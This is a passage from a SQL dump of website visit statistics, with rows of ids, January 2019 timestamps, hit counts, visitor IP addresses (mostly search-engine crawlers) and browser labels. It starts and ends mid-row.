1546610722,1,1,0,0,'40.77.167.67','other'),(364930,1546610844,1,1,0,0,'66.249.66.154','chrome'),(364931,1546610882,1,1,0,0,'46.133.211.252','chrome'),(364932,1546611397,1,1,0,0,'66.249.66.40','chrome'),(364933,1546611786,1,1,0,0,'216.244.66.241','other'),(364934,1546611791,1,1,0,0,'46.229.168.148','other'),(364935,1546612169,1,1,0,0,'66.249.66.156','chrome'),(364936,1546612262,2,2,0,0,'157.55.39.74','other'),(364937,1546612559,1,1,0,0,'157.55.39.58','other'),(364938,1546612889,1,1,0,0,'46.229.168.153','other'),(364939,1546613061,1,1,0,0,'46.229.168.132','other'),(364940,1546613062,1,1,0,0,'46.229.168.146','other'),(364941,1546613174,1,1,0,0,'151.80.39.102','other'),(364942,1546613192,6,6,0,0,'216.244.66.241','other'),(364943,1546613726,1,1,0,0,'178.133.115.60','other'),(364944,1546614094,2,2,0,0,'216.244.66.241','other'),(364945,1546614220,1,1,0,0,'157.55.39.58','other'),(364946,1546614325,1,1,0,0,'46.229.168.133','other'),(364947,1546614327,1,1,0,0,'46.229.168.141','other'),(364948,1546614517,1,1,0,0,'40.77.167.67','other'),(364949,1546614878,1,1,0,0,'46.229.168.135','other'),(364950,1546615015,1,1,0,0,'66.249.66.44','chrome'),(364951,1546615512,1,1,0,0,'8.29.198.25','other'),(364952,1546616069,7,7,0,0,'216.244.66.241','other'),(364953,1546616558,1,1,0,0,'8.29.198.26','other'),(364954,1546616947,3,3,0,0,'66.249.66.156','chrome'),(364955,1546617063,3,3,0,0,'216.244.66.241','other'),(364956,1546617499,2,2,0,0,'66.249.66.152','chrome'),(364957,1546617599,1,1,0,0,'141.8.142.103','other'),(364958,1546617635,1,1,0,0,'46.229.168.149','other'),(364959,1546617766,1,1,0,0,'87.250.224.47','other'),(364960,1546617797,2,2,0,0,'5.45.207.79','other'),(364961,1546617820,4,4,0,0,'178.154.244.11','other'),(364962,1546617972,1,1,0,0,'66.249.66.157','chrome'),(364963,1546617973,1,1,0,0,'66.249.66.154','chrome'),(364964,1546618032,1,1,0,0,'185.253.97.244','firefox'),(364965,1546618152,2,2,0,0,'5.45.207.19','other'),(364966,1546618903,7,7,0,0,'216.244.66.241','other'),(364967,1546619208,1,1,0,0,'66.249.66.154','chrome'),(364968,1546619306,1,1,0,0,'66.249.66.152','chrome'),(364969,1546619327,1,1,0,0,'46.229.168.150','other'),(364970,1546619329,1,1,0,0,'46.229.168.145','other'),(364971,1546619626,1,1,0,0,'188.163.32.7','other'),(364972,1546619684,1,1,0,0,'95.163.255.165','other'),(364973,1546619687,1,1,0,0,'95.163.255.196','other'),(364974,1546619816,1,1,0,0,'216.244.66.241','other'),(364975,1546620159,1,1,0,0,'66.249.66.154','chrome'),(364976,1546620160,1,1,0,0,'66.226.75.93','other'),(364977,1546620365,1,1,0,0,'91.124.119.243','chrome'),(364978,1546620624,1,1,0,0,'46.229.168.149','other'),(364979,1546620723,1,1,0,0,'62.205.134.182','msie'),(364980,1546620771,1,1,0,0,'216.244.66.241','other'),(364981,1546620990,1,1,0,0,'46.229.168.136','other'),(364982,1546621142,1,1,0,0,'66.249.66.156','chrome'),(364983,1546621738,6,6,0,0,'216.244.66.241','other'),(364984,1546621796,1,1,0,0,'46.229.168.146','other'),(364985,1546622017,1,1,0,0,'46.211.47.32','chrome'),(364986,1546622019,2,2,0,0,'95.163.255.114','other'),(364987,1546622071,1,1,0,0,'157.55.39.74','other'),(364988,1546622074,1,1,0,0,'95.163.255.109','other'),(364989,1546622119,1,1,0,0,'95.163.255.105','other'),(364990,1546622158,1,1,0,0,'95.163.255.106','other'),(364991,1546622189,1,1,0,0,'95.163.255.102','other'),(364992,1546622809,3,3,0,0,'216.244.66.241','other'),(364993,1546623006,1,1,0,0,'66.249.66.155','chrome'),(364995,1546623323,1,1,0,0,'207.46.13.36','other'),(364996,1546623611,1,1,0,0,'66.249.66.157','chrome'),(364997,1546623612,1,1,0,0,'66.249.66.152','chrome'),(364998,1546623677,1,1,0,0,'40.77.167.137','other'),(364999,1546624075,2,2,0,0,'91.196.178.94','firefox'),(365000,1546624302,1,1,0,0,'209.17.97.58','other'),(365001,1546624571,4,4,0,0,'216.244.66.241','other'),(365002,1546624788,1,1,0,0,'46.229.168.145','other'),(365003,1546625600,2,2,0,0,'216.244.66.241','other'),(365004,1546625748,2,2,0,0,'95.158.38.170','other'),(365005,1546626340,1,1,0,0,'8.29.198.26','other'),(365006,1546626668,1,1,0,0,'46.229.168.154','other'),(365007,1546627105,1,1,0,0,'66.249.66.156','chrome'),(365008,1546627201,1,1,0,0,'40.77.167.137','other'),(365009,1546627399,1,1,0,0,'8.29.198.26','other'),(365010,1546627463,4,4,0,0,'216.244.66.241','other'),(365011,1546627599,1,1,0,0,'46.229.168.143','other'),(365012,1546627640,1,1,0,0,'66.249.66.154','chrome'),(365013,1546627842,1,1,0,0,'46.229.168.147','other'),(365014,1546628133,1,1,0,0,'54.36.148.127','other'),(365015,1546628278,1,1,0,0,'66.249.66.157','chrome'),(365016,1546628279,3,3,0,0,'66.249.66.156','chrome'),(365017,1546628453,1,1,0,0,'54.36.148.13','other'),(365018,1546628479,1,1,0,0,'5.45.207.79','other'),(365019,1546628482,1,1,0,0,'216.244.66.241','other'),(365020,1546628870,1,1,0,0,'46.229.168.146','other'),(365021,1546629146,1,1,0,0,'54.36.149.15','other'),(365022,1546629365,1,1,0,0,'46.229.168.151','other'),(365023,1546630033,1,1,0,0,'54.36.149.6','other'),(365024,1546630078,1,1,0,0,'46.229.168.153','other'),(365025,1546630232,8,8,0,0,'216.244.66.241','other'),(365026,1546630320,1,1,0,0,'157.55.39.70','other'),(365027,1546630380,1,1,0,0,'54.36.148.77','other'),(365028,1546631108,1,1,0,0,'157.55.39.58','other'),(365029,1546631279,3,3,0,0,'216.244.66.241','other'),(365030,1546632050,1,1,0,0,'54.36.148.107','other'),(365031,1546632107,1,1,0,0,'54.36.148.189','other'),(365032,1546632366,1,1,0,0,'157.55.39.58','other'),(365033,1546632554,1,1,0,0,'54.36.148.117','other'),(365034,1546632567,1,1,0,0,'54.36.148.13','other'),(365035,1546632955,1,1,0,0,'66.249.66.155','chrome'),(365036,1546632956,1,1,0,0,'66.249.66.156','chrome'),(365037,1546633032,3,3,0,0,'216.244.66.241','other'),(365038,1546633120,1,1,0,0,'54.36.148.208','other'),(365039,1546633363,1,1,0,0,'54.36.148.190','other'),(365040,1546633725,21,21,0,0,'157.55.39.70','other'),(365041,1546633746,16,16,0,0,'157.55.39.217','other'),(365042,1546633888,16,16,0,0,'157.55.39.229','other'),(365043,1546634005,1,1,0,0,'54.36.148.73','other'),(365044,1546634078,2,2,0,0,'216.244.66.241','other'),(365045,1546634102,1,1,0,0,'207.46.13.17','other'),(365046,1546634175,1,1,0,0,'54.36.148.151','other'),(365047,1546634306,1,1,0,0,'5.45.207.79','other'),(365048,1546634309,1,1,0,0,'178.154.171.69','other'),(365049,1546634359,1,1,0,0,'54.36.148.186','other'),(365050,1546634364,2,2,0,0,'91.196.178.167','chrome'),(365051,1546634463,1,1,0,0,'46.229.168.154','other'),(365052,1546634643,2,2,0,0,'46.229.168.143','other'),(365053,1546634644,1,1,0,0,'46.229.168.141','other'),(365054,1546634851,1,1,0,0,'54.36.149.69','other'),(365055,1546634937,1,1,0,0,'46.229.168.129','other'),(365056,1546634966,1,1,0,0,'13.66.139.0','other'),(365057,1546634977,16,16,0,0,'95.216.2.253','other'),(365058,1546635051,1,1,0,0,'54.36.148.65','other'),(365059,1546635070,1,1,0,0,'157.55.39.70','other'),(365060,1546635242,1,1,0,0,'54.36.148.78','other'),(365061,1546635544,1,1,0,0,'54.36.148.69','other'),(365062,1546635584,1,1,0,0,'66.249.66.155','chrome'),(365063,1546635585,1,1,0,0,'66.249.66.154','chrome'),(365064,1546635922,7,7,0,0,'216.244.66.241','other'),(365065,1546635927,1,1,0,0,'54.36.148.138','other'),(365066,1546636312,1,1,0,0,'46.229.168.142','other'),(365067,1546636499,1,1,0,0,'54.36.148.254','other'),(365068,1546636809,2,2,0,0,'66.249.66.57','chrome'),(365070,1546636871,2,2,0,0,'66.249.66.40','chrome'),(365071,1546636915,4,4,0,0,'136.243.37.219','other'),(365072,1546637040,1,1,0,0,'216.244.66.241','other'),(365073,1546637172,1,1,0,0,'8.29.198.26','other'),(365074,1546637397,1,1,0,0,'95.163.255.152','other'),(365075,1546637400,1,1,0,0,'95.163.255.178','other'),(365076,1546637595,1,1,0,0,'54.36.148.240','other'),(365077,1546637651,1,1,0,0,'40.77.167.76','other'),(365078,1546638232,1,1,0,0,'8.29.198.26','other'),(365079,1546638690,2,2,0,0,'40.77.167.76','other'),(365080,1546638832,8,8,0,0,'216.244.66.241','other'),(365081,1546638839,1,1,0,0,'54.36.148.209','other'),(365082,1546639211,1,1,0,0,'54.36.149.26','other'),(365083,1546639483,1,1,0,0,'46.229.168.153','other'),(365084,1546639485,1,1,0,0,'46.229.168.147','other'),(365085,1546639986,1,1,0,0,'46.229.168.149','other'),(365086,1546640124,2,2,0,0,'40.77.167.74','other'),(365087,1546640176,1,1,0,0,'54.36.148.124','other'),(365088,1546640416,1,1,0,0,'54.36.148.208','other'),(365089,1546640477,1,1,0,0,'5.45.207.19','other'),(365090,1546641127,1,1,0,0,'180.76.15.149','other'),(365091,1546641128,1,1,0,0,'180.76.15.159','other'),(365092,1546641132,1,1,0,0,'95.163.255.98','other'),(365093,1546641134,1,1,0,0,'95.163.255.95','other'),(365094,1546641575,3,3,0,0,'216.244.66.241','other'),(365095,1546642581,1,1,0,0,'46.229.168.129','other'),(365096,1546642627,2,2,0,0,'216.244.66.241','other'),(365097,1546643110,1,1,0,0,'46.229.168.137','other'),(365098,1546643829,1,1,0,0,'141.8.142.103','other'),(365099,1546643845,3,3,0,0,'40.77.167.76','other'),(365100,1546643904,1,1,0,0,'54.36.149.2','other'),(365101,1546643945,1,1,0,0,'13.66.139.0','other'),(365102,1546644304,1,1,0,0,'66.249.66.157','chrome'),(365104,1546644378,1,1,0,0,'54.36.149.7','other'),(365105,1546644397,13,13,0,0,'216.244.66.241','other'),(365106,1546644506,1,1,0,0,'40.77.167.71','other'),(365107,1546644712,1,1,0,0,'46.229.168.144','other'),(365108,1546644724,1,1,0,0,'66.249.66.155','chrome'),(365109,1546644725,1,1,0,0,'66.249.66.152','chrome'),(365110,1546644812,1,1,0,0,'54.36.148.231','other'),(365111,1546644972,1,1,0,0,'54.36.148.72','other'),(365112,1546645146,1,1,0,0,'54.36.149.66','other'),(365113,1546645615,1,1,0,0,'216.244.66.241','other'),(365114,1546645621,1,1,0,0,'66.249.66.156','chrome'),(365115,1546645622,1,1,0,0,'66.249.66.154','chrome'),(365116,1546645647,1,1,0,0,'69.12.72.169','chrome'),(365117,1546645692,1,1,0,0,'54.36.148.14','other'),(365118,1546645946,1,1,0,0,'18.222.191.199','other'),(365119,1546646120,1,1,0,0,'40.77.167.70','other'),(365120,1546646328,1,1,0,0,'54.36.148.107','other'),(365121,1546647021,12,12,0,0,'207.46.13.17','other'),(365122,1546647217,1,1,0,0,'54.36.148.170','other'),(365123,1546647223,6,6,0,0,'216.244.66.241','other'),(365124,1546647224,1,1,0,0,'54.36.148.131','other'),(365125,1546647441,2,2,0,0,'37.9.113.148','other'),(365126,1546647527,1,1,0,0,'54.36.149.30','other'),(365127,1546647587,2,2,0,0,'87.250.224.47','other'),(365128,1546647806,2,2,0,0,'178.154.244.11','other'),(365129,1546647878,1,1,0,0,'54.36.148.213','other'),(365130,1546647960,1,1,0,0,'54.36.149.65','other'),(365131,1546648007,1,1,0,0,'8.29.198.26','other'),(365132,1546648058,1,1,0,0,'46.229.168.154','other'),(365133,1546648252,2,2,0,0,'5.45.207.79','other'),(365134,1546648980,2,2,0,0,'66.249.66.152','chrome'),(365135,1546649045,1,1,0,0,'54.36.149.94','other'),(365136,1546649071,1,1,0,0,'8.29.198.27','other'),(365137,1546649744,1,1,0,0,'54.36.148.65','other'),(365138,1546649829,1,1,0,0,'185.107.47.215','other'),(365139,1546649831,1,1,0,0,'54.38.120.209','other'),(365140,1546650011,10,10,0,0,'216.244.66.241','other'),(365141,1546650063,1,1,0,0,'54.36.149.61','other'),(365142,1546650105,1,1,0,0,'66.249.66.44','chrome'),(365143,1546650365,1,1,0,0,'54.36.149.55','other'),(365144,1546650759,1,1,0,0,'66.249.66.42','chrome'),(365145,1546650778,1,1,0,0,'40.77.167.71','other'),(365146,1546650927,1,1,0,0,'54.36.149.14','other'),(365147,1546651150,1,1,0,0,'46.229.168.130','other'),(365148,1546651569,1,1,0,0,'95.163.255.92','other'),(365149,1546651571,1,1,0,0,'95.163.255.93','other'),(365150,1546651757,1,1,0,0,'54.36.148.175','other'),(365151,1546651812,1,1,0,0,'40.77.167.74','other'),(365152,1546652217,1,1,0,0,'40.77.167.0','other'),(365153,1546652725,1,1,0,0,'46.229.168.144','other'),(365154,1546652833,4,4,0,0,'216.244.66.241','other'),(365155,1546653051,1,1,0,0,'40.77.167.76','other'),(365156,1546653093,1,1,0,0,'46.229.168.138','other'),(365157,1546653176,2,2,0,0,'46.229.168.141','other'),(365158,1546653200,1,1,0,0,'66.249.66.152','chrome'),(365159,1546653449,1,1,0,0,'54.36.148.138','other'),(365160,1546653544,1,1,0,0,'180.76.15.15','other'),(365161,1546653545,1,1,0,0,'180.76.15.23','other'),(365162,1546653852,1,1,0,0,'54.36.148.165','other'),(365163,1546654148,1,1,0,0,'216.244.66.241','other'),(365164,1546654751,1,1,0,0,'95.163.255.174','other'),(365165,1546654754,1,1,0,0,'95.163.255.154','other'),(365166,1546654773,1,1,0,0,'54.36.149.38','other'),(365167,1546655638,9,9,0,0,'216.244.66.241','other'),(365168,1546656203,1,1,0,0,'54.36.148.20','other'),(365169,1546656482,1,1,0,0,'54.36.149.60','other'),(365170,1546656497,1,1,0,0,'54.36.148.38','other'),(365171,1546656644,1,1,0,0,'54.36.148.28','other'),(365172,1546656682,1,1,0,0,'46.229.168.135','other'),(365173,1546656747,1,1,0,0,'95.163.255.67','other'),(365174,1546656750,1,1,0,0,'95.163.255.62','other'),(365175,1546656877,1,1,0,0,'194.113.106.124','chrome'),(365176,1546657120,1,1,0,0,'54.36.148.185','other'),(365177,1546657312,1,1,0,0,'88.99.2.203','other'),(365178,1546657348,1,1,0,0,'54.36.149.41','other'),(365179,1546657367,1,1,0,0,'54.36.148.109','other'),(365180,1546657442,1,1,0,0,'54.36.148.224','other'),(365181,1546657480,1,1,0,0,'46.229.168.150','other'),(365182,1546657606,1,1,0,0,'40.77.167.0','other'),(365183,1546657931,1,1,0,0,'54.36.149.5','other'),(365184,1546658083,1,1,0,0,'54.36.149.37','other'),(365185,1546658134,2,2,0,0,'5.45.207.19','other'),(365186,1546658227,15,15,0,0,'157.55.39.243','other'),(365187,1546658246,1,1,0,0,'95.108.213.4','other'),(365188,1546658420,1,1,0,0,'54.36.149.49','other'),(365189,1546658425,11,11,0,0,'216.244.66.241','other'),(365190,1546658446,1,1,0,0,'141.8.142.103','other'),(365191,1546658454,1,1,0,0,'46.229.168.146','other'),(365192,1546658476,2,2,0,0,'178.154.244.11','other'),(365193,1546658493,2,2,0,0,'5.45.207.79','other'),(365194,1546658535,1,1,0,0,'54.36.148.230','other'),(365195,1546658548,21,21,0,0,'40.77.167.0','other'),(365196,1546658581,16,16,0,0,'157.55.39.241','other'),(365197,1546658840,1,1,0,0,'8.29.198.27','other'),(365198,1546658985,1,1,0,0,'54.36.148.206','other'),(365199,1546659744,1,1,0,0,'40.77.167.80','other'),(365200,1546659810,2,2,0,0,'216.244.66.241','other'),(365201,1546659903,1,1,0,0,'8.29.198.25','other'),(365202,1546660187,1,1,0,0,'66.249.66.154','chrome'),(365203,1546660326,1,0,1,0,'66.249.66.57',''),(365205,1546660374,1,1,0,0,'66.249.66.57','chrome'),(365207,1546660447,1,1,0,0,'54.36.148.147','other'),(365208,1546660608,2,2,0,0,'157.55.39.83','other'),(365209,1546660792,1,1,0,0,'51.255.65.46','other'),(365210,1546660928,1,1,0,0,'54.36.149.8','other'),(365211,1546661059,1,1,0,0,'157.55.39.243','other'),(365212,1546661226,1,1,0,0,'54.36.148.146','other'),(365213,1546661234,6,6,0,0,'216.244.66.241','other'),(365214,1546661572,1,1,0,0,'46.229.168.142','other'),(365215,1546661902,1,1,0,0,'54.36.148.179','other'),(365216,1546662454,1,1,0,0,'54.36.149.42','other'),(365217,1546662744,1,1,0,0,'157.55.39.243','other'),(365218,1546662780,1,1,0,0,'157.55.39.83','other'),(365220,1546663358,1,1,0,0,'54.36.149.5','other'),(365221,1546663622,1,1,0,0,'46.229.168.133','other'),(365222,1546664077,12,12,0,0,'216.244.66.241','other'),(365223,1546664247,2,2,0,0,'95.213.141.126','opera'),(365224,1546664371,1,1,0,0,'158.69.72.75','other'),(365225,1546664512,1,1,0,0,'88.99.2.203','other'),(365226,1546664602,1,1,0,0,'95.163.255.177','other'),(365227,1546664614,1,1,0,0,'95.163.255.180','other'),(365228,1546665007,1,1,0,0,'157.55.39.241','other'),(365229,1546665235,1,1,0,0,'46.229.168.132','other'),(365230,1546665307,1,1,0,0,'66.249.66.156','chrome'),(365231,1546665437,1,1,0,0,'54.36.149.52','other'),(365232,1546665752,1,1,0,0,'54.36.149.15','other'),(365233,1546665976,1,1,0,0,'178.154.244.11','other'),(365234,1546666689,1,1,0,0,'54.36.148.199','other'),(365235,1546666866,7,7,0,0,'216.244.66.241','other'),(365236,1546667295,2,2,0,0,'54.184.145.107','chrome'),(365237,1546667565,1,1,0,0,'66.249.66.157','chrome'),(365238,1546667567,1,1,0,0,'66.249.66.154','chrome'),(365239,1546667642,1,1,0,0,'207.46.13.144','other'),(365240,1546667991,3,3,0,0,'216.244.66.241','other'),(365241,1546668196,1,1,0,0,'54.36.148.58','other'),(365242,1546668497,2,2,0,0,'54.36.148.190','other'),(365243,1546668585,1,1,0,0,'5.45.207.79','other'),(365244,1546668671,2,2,0,0,'185.220.102.8','other'),(365245,1546668732,1,1,0,0,'46.229.168.129','other'),(365246,1546668734,1,1,0,0,'46.229.168.149','other'),(365247,1546669249,2,2,0,0,'213.180.203.9','other'),(365248,1546669305,1,1,0,0,'141.8.142.103','other'),(365249,1546669388,1,1,0,0,'207.46.13.107','other'),(365250,1546669593,1,1,0,0,'54.36.148.168','other'),(365251,1546669664,1,1,0,0,'8.29.198.26','other'),(365252,1546669667,2,2,0,0,'216.244.66.241','other'),(365253,1546669752,1,1,0,0,'54.36.148.252','other'),(365254,1546670067,1,1,0,0,'54.36.149.67','other'),(365255,1546670218,1,1,0,0,'54.36.148.119','other'),(365256,1546670378,1,1,0,0,'46.229.168.134','other'),(365257,1546670652,1,1,0,0,'141.8.142.103','other'),(365258,1546670742,1,1,0,0,'8.29.198.26','other'),(365259,1546670879,1,1,0,0,'54.36.149.91','other'),(365260,1546671009,1,1,0,0,'216.244.66.241','other'),(365261,1546671201,1,1,0,0,'54.36.148.96','other'),(365262,1546671259,1,1,0,0,'157.55.39.129','other'),(365263,1546671661,1,1,0,0,'54.36.148.247','other'),(365264,1546671822,4,4,0,0,'157.55.39.132','other'),(365265,1546671897,1,1,0,0,'46.229.168.130','other'),(365266,1546672209,1,1,0,0,'54.36.148.117','other'),(365267,1546672412,2,2,0,0,'207.46.13.107','other'),(365268,1546672436,1,1,0,0,'46.229.168.151','other'),(365269,1546672466,6,6,0,0,'216.244.66.241','other'),(365270,1546672744,1,1,0,0,'46.229.168.147','other'),(365271,1546672746,1,1,0,0,'46.229.168.154','other'),(365272,1546672748,1,1,0,0,'54.36.149.106','other'),(365273,1546672854,1,1,0,0,'54.36.149.63','other'),(365274,1546673047,1,1,0,0,'66.249.66.156','chrome'),(365275,1546673073,1,1,0,0,'66.249.66.155','chrome'),(365276,1546673074,1,1,0,0,'66.249.66.154','chrome'),(365277,1546673549,1,1,0,0,'216.244.66.241','other'),(365278,1546673558,1,1,0,0,'157.55.39.132','other'),(365279,1546674286,1,1,0,0,'46.229.168.142','other'),(365280,1546674822,1,1,0,0,'95.163.255.94','other'),(365281,1546674825,1,1,0,0,'95.163.255.98','other'),(365282,1546675150,1,1,0,0,'82.145.209.143','other'),(365283,1546675189,1,1,0,0,'54.36.149.89','other'),(365284,1546675313,4,4,0,0,'216.244.66.241','other'),(365285,1546675490,1,1,0,0,'66.249.66.157','chrome'),(365287,1546675795,2,2,0,0,'46.211.134.65','chrome'),(365288,1546675799,1,1,0,0,'54.36.148.223','other'),(365289,1546676048,2,2,0,0,'66.249.66.156','chrome'),(365290,1546676139,1,1,0,0,'130.180.220.184','other'),(365291,1546676201,1,1,0,0,'54.36.148.153','other'),(365292,1546676220,1,1,0,0,'66.249.66.195','chrome'),(365294,1546676298,3,3,0,0,'178.95.157.7','chrome'),(365295,1546676349,1,1,0,0,'18.184.52.215','other'),(365296,1546676828,1,1,0,0,'37.115.190.44','chrome'),(365297,1546676953,1,1,0,0,'54.36.148.122','other'),(365298,1546677345,1,1,0,0,'46.229.168.154','other'),(365299,1546678055,9,9,0,0,'216.244.66.241','other'),(365300,1546678182,1,1,0,0,'46.229.168.135','other'),(365301,1546678764,1,1,0,0,'54.36.149.92','other'),(365302,1546679110,1,1,0,0,'5.45.207.19','other'),(365303,1546679175,2,2,0,0,'91.209.11.236','other'),(365304,1546679448,2,2,0,0,'178.154.244.11','other'),(365305,1546679516,1,1,0,0,'54.36.148.68','other'),(365306,1546679612,1,1,0,0,'54.36.148.147','other'),(365307,1546679619,3,3,0,0,'216.244.66.241','other'),(365308,1546679803,1,1,0,0,'87.250.224.47','other'),(365309,1546680293,1,1,0,0,'46.229.168.132','other'),(365310,1546680393,1,1,0,0,'54.36.148.53','other'),(365311,1546680430,1,1,0,0,'54.36.148.103','other'),(365312,1546680498,1,1,0,0,'8.29.198.26','other'),(365313,1546680510,1,1,0,0,'54.36.148.56','other'),(365314,1546680515,1,1,0,0,'207.46.13.107','other'),(365315,1546680524,1,1,0,0,'54.36.149.34','other'),(365316,1546680589,1,1,0,0,'207.46.13.144','other'),(365317,1546680864,3,3,0,0,'216.244.66.241','other'),(365318,1546680888,1,1,0,0,'46.229.168.141','other'),(365319,1546681197,1,1,0,0,'157.55.39.132','other'),(365320,1546681289,1,1,0,0,'66.249.66.155','chrome'),(365321,1546681291,2,2,0,0,'66.249.66.154','chrome'),(365322,1546681294,1,1,0,0,'46.229.168.145','other'),(365323,1546681296,1,1,0,0,'46.229.168.139','other'),(365324,1546681575,1,1,0,0,'8.29.198.27','other'),(365325,1546681663,1,1,0,0,'207.46.13.107','other'),(365326,1546681921,1,1,0,0,'207.46.13.36','other'),(365327,1546681946,1,1,0,0,'66.249.66.157','chrome'),(365328,1546682185,1,1,0,0,'54.36.148.234','other'),(365329,1546682228,1,1,0,0,'91.196.178.39','chrome'),(365330,1546682407,1,1,0,0,'66.249.66.152','chrome'),(365331,1546682432,1,1,0,0,'157.55.39.132','other'),(365332,1546682635,1,1,0,0,'66.249.66.155','chrome'),(365333,1546682636,1,1,0,0,'66.249.66.154','chrome'),(365334,1546683676,7,7,0,0,'216.244.66.241','other'),(365335,1546684246,1,1,0,0,'92.113.214.164','firefox'),(365336,1546684725,1,1,0,0,'216.244.66.241','other'),(365337,1546684976,1,1,0,0,'66.249.66.156','chrome'),(365338,1546685089,1,1,0,0,'54.36.148.103','other'),(365339,1546685453,1,1,0,0,'46.229.168.134','other'),(365340,1546685483,1,1,0,0,'207.46.13.107','other'),(365341,1546685674,1,1,0,0,'54.36.148.27','other'),(365342,1546685688,1,1,0,0,'66.249.66.155','chrome'),(365343,1546685780,2,2,0,0,'157.55.39.132','other'),(365344,1546686001,1,1,0,0,'95.163.255.92','other'),(365345,1546686152,1,1,0,0,'188.163.122.129','other'),(365346,1546686231,1,1,0,0,'54.36.149.61','other'),(365347,1546686456,5,5,0,0,'216.244.66.241','other'),(365348,1546686702,1,1,0,0,'54.36.149.41','other'),(365349,1546686786,1,1,0,0,'195.211.240.188','chrome'),(365350,1546687041,1,1,0,0,'213.180.203.9','other'),(365351,1546687149,1,1,0,0,'95.108.213.4','other'),(365352,1546687165,1,1,0,0,'40.77.167.69','other'),(365353,1546687285,1,1,0,0,'54.36.148.206','other'),(365354,1546687325,1,1,0,0,'178.154.171.24','other'),(365355,1546687362,1,1,0,0,'178.154.244.11','other'),(365356,1546687649,4,4,0,0,'54.89.117.42','chrome'),(365357,1546687999,2,2,0,0,'89.178.100.43','chrome'),(365358,1546688269,1,1,0,0,'66.249.66.152','chrome'),(365359,1546688665,1,1,0,0,'46.229.168.143','other'),(365360,1546689142,1,1,0,0,'54.36.148.39','other'),(365361,1546689177,1,1,0,0,'46.229.168.130','other'),(365362,1546689233,7,7,0,0,'216.244.66.241','other'),(365363,1546689240,1,1,0,0,'54.36.148.154','other'),(365364,1546689513,1,1,0,0,'54.36.148.57','other'),(365365,1546689776,1,1,0,0,'54.36.148.196','other'),(365366,1546689825,1,1,0,0,'66.249.66.154','chrome'),(365367,1546690121,1,1,0,0,'95.163.255.109','other'),(365368,1546690146,1,1,0,0,'95.163.255.102','other'),(365369,1546690202,1,1,0,0,'54.36.148.61','other'),(365370,1546690602,1,1,0,0,'5.45.207.79','other'),(365371,1546691292,1,1,0,0,'54.36.148.184','other'),(365372,1546691322,1,1,0,0,'8.29.198.26','other'),(365373,1546691437,1,1,0,0,'46.229.168.134','other'),(365374,1546691622,1,1,0,0,'178.154.244.11','other'),(365375,1546691623,1,1,0,0,'95.108.213.4','other'),(365376,1546691653,1,1,0,0,'95.163.255.113','other'),(365377,1546691659,1,1,0,0,'95.163.255.112','other'),(365378,1546691846,2,2,0,0,'95.163.255.185','other'),(365379,1546691883,1,1,0,0,'54.36.149.80','other'),(365380,1546692038,9,9,0,0,'216.244.66.241','other'),(365381,1546692218,1,1,0,0,'54.36.148.162','other'),(365382,1546692408,1,1,0,0,'8.29.198.26','other'),(365383,1546692752,1,1,0,0,'54.36.148.15','other'),(365384,1546692965,1,1,0,0,'66.249.66.157','chrome'),(365385,1546692967,1,1,0,0,'66.249.66.152','chrome'),(365386,1546693150,1,1,0,0,'46.211.20.210','chrome'),(365387,1546693380,1,1,0,0,'216.244.66.241','other'),(365388,1546693463,1,1,0,0,'66.249.66.154','chrome'),(365389,1546693796,1,1,0,0,'54.36.148.173','other'),(365390,1546694142,1,1,0,0,'157.55.39.132','other'),(365391,1546694371,1,1,0,0,'193.110.100.33','chrome'),(365392,1546694432,1,1,0,0,'66.249.66.152','chrome'),(365393,1546694623,1,1,0,0,'207.46.13.107','other'),(365394,1546694687,3,3,0,0,'157.55.39.129','other'),(365395,1546694704,1,1,0,0,'54.36.148.97','other'),(365396,1546694839,2,2,0,0,'5.45.207.19','other'),(365398,1546694881,5,5,0,0,'216.244.66.241','other'),(365399,1546696019,2,2,0,0,'157.55.39.132','other'),(365400,1546696041,2,2,0,0,'66.249.66.152','chrome'),(365401,1546696112,1,1,0,0,'157.55.39.129','other'),(365402,1546696224,1,1,0,0,'66.249.66.154','chrome'),(365403,1546696494,1,1,0,0,'46.229.168.137','other'),(365404,1546696496,1,1,0,0,'46.229.168.152','other'),(365405,1546696502,1,1,0,0,'95.163.255.105','other'),(365406,1546696595,1,1,0,0,'66.249.66.155','chrome'),(365407,1546696757,1,1,0,0,'66.249.66.157','chrome'),(365408,1546696787,1,1,0,0,'46.229.168.140','other'),(365409,1546697272,1,1,0,0,'54.36.148.229','other'),(365410,1546697548,1,1,0,0,'95.163.255.119','other'),(365411,1546697643,6,6,0,0,'216.244.66.241','other'),(365412,1546697791,3,3,0,0,'66.249.66.156','chrome'),(365413,1546697946,1,1,0,0,'66.249.66.42','chrome'),(365414,1546698659,1,1,0,0,'46.242.14.74','msie'),(365415,1546698846,2,2,0,0,'91.209.11.236','other'),(365416,1546699024,1,1,0,0,'46.229.168.148','other'),(365417,1546699042,1,1,0,0,'54.36.148.143','other'),(365418,1546699148,1,1,0,0,'216.244.66.241','other'),(365419,1546699356,2,2,0,0,'46.211.125.64','chrome'),(365420,1546699546,1,1,0,0,'207.46.13.107','other'),(365421,1546700030,1,1,0,0,'54.36.148.191','other'),(365422,1546700310,1,1,0,0,'40.77.167.123','other'),(365423,1546700536,3,3,0,0,'216.244.66.241','other'),(365424,1546700544,1,1,0,0,'46.229.168.135','other'),(365425,1546700739,1,1,0,0,'54.36.149.44','other'),(365426,1546701512,1,1,0,0,'46.201.43.233','chrome'),(365427,1546701857,1,1,0,0,'95.163.255.112','other'),(365428,1546701876,1,1,0,0,'95.163.255.102','other'),(365429,1546702155,1,1,0,0,'8.29.198.27','other'),(365430,1546702317,1,1,0,0,'54.36.148.180','other'),(365431,1546703031,3,3,0,0,'66.249.66.156','chrome'),(365432,1546703240,1,1,0,0,'8.29.198.26','other'),(365433,1546703319,1,1,0,0,'54.36.148.80','other'),(365434,1546703588,5,5,0,0,'216.244.66.241','other'),(365435,1546703708,1,1,0,0,'157.55.39.132','other'),(365436,1546704542,1,1,0,0,'54.36.148.99','other'),(365437,1546704551,1,1,0,0,'46.229.168.153','other'),(365438,1546704603,1,1,0,0,'216.244.66.241','other'),(365439,1546704718,1,1,0,0,'207.46.13.107','other'),(365440,1546704748,2,2,0,0,'40.77.167.123','other'),(365441,1546705150,1,1,0,0,'207.46.13.144','other'),(365442,1546705332,2,2,0,0,'157.55.39.129','other'),(365443,1546705503,1,1,0,0,'54.36.149.82','other'),(365444,1546705764,1,1,0,0,'54.36.148.187','other'),(365445,1546706244,4,4,0,0,'216.244.66.241','other'),(365446,1546706568,7,7,0,0,'5.45.207.19','other'),(365447,1546706741,1,1,0,0,'95.108.213.4','other'),(365448,1546706839,1,1,0,0,'66.249.66.157','chrome'),(365449,1546706